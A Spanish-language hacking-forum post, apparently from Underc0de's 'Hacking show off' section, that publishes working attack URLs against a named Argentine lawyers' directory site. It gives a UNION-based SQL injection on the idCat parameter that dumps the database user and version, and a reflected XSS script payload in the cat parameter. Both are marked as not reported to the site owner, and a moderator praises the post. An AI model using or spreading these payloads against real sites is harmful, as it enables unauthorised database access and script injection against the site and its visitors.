Underc0de

Sitio : www.abogadosrosarinos.com
Descripción del sitio : Pagina para contratar Abogados en Argentina

Hola!!!

• [SQLi] Inyección en URL .
      (http://fotos.subefotos.com/247d7819896956a92c4af2af6f3375e4o.png)
      Url del sitio : http://www.abogadosrosarinos.com/lista.php?idCat=
      xploit : http://www.abogadosrosarinos.com/lista.php?idCat=-9 union select 1,2,user(),(@@version),5,6,7,8 -- &cat=foro (http://www.abogadosrosarinos.com/lista.php?idCat=-9%20union%20select%201,2,user(),(@@version),5,6,7,8%20--%20&cat=foro)
      Reportado: NO
      Autor: RREEDD


• [XSS] Inyección en URL
       (http://fotos.subefotos.com/6bb1467cfb27bd30b3b7de0cc551d922o.png)
      Url del sitio : http://www.abogadosrosarinos.com/lista.php?idCat=1&cat=
      Vector:  <script>prompt('underc0de','rreedd');</script>
      xploit : http://www.abogadosrosarinos.com/lista.php?idCat=1&cat=<script>prompt('underc0de','rreedd');</script> (http://www.abogadosrosarinos.com/lista.php?idCat=1&cat=<script>prompt('underc0de','rreedd');</script>)
      Reportado: NO
      Autor: RREEDD
  

Espero les guste y cualquier reparo o consulta por favor no dudes en postear

Perfecto @rreedd (https://underc0de.org/foro/index.php?action=profile;u=51615) ! así tienen que ser los reportes en "Hacking show off" con el payload explotando la falla.

Saludos!, EPSILON.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Perfecto @rreedd (https://underc0de.org/foro/index.php?action=profile;u=51615) ! así tienen que ser los reportes en "Hacking show off" con el payload explotando la falla.

Saludos!, EPSILON.

Gracias @EPSILON (https://underc0de.org/foro/profile/EPSILON/), quería reivindicarme con mis siguientes post  ;D.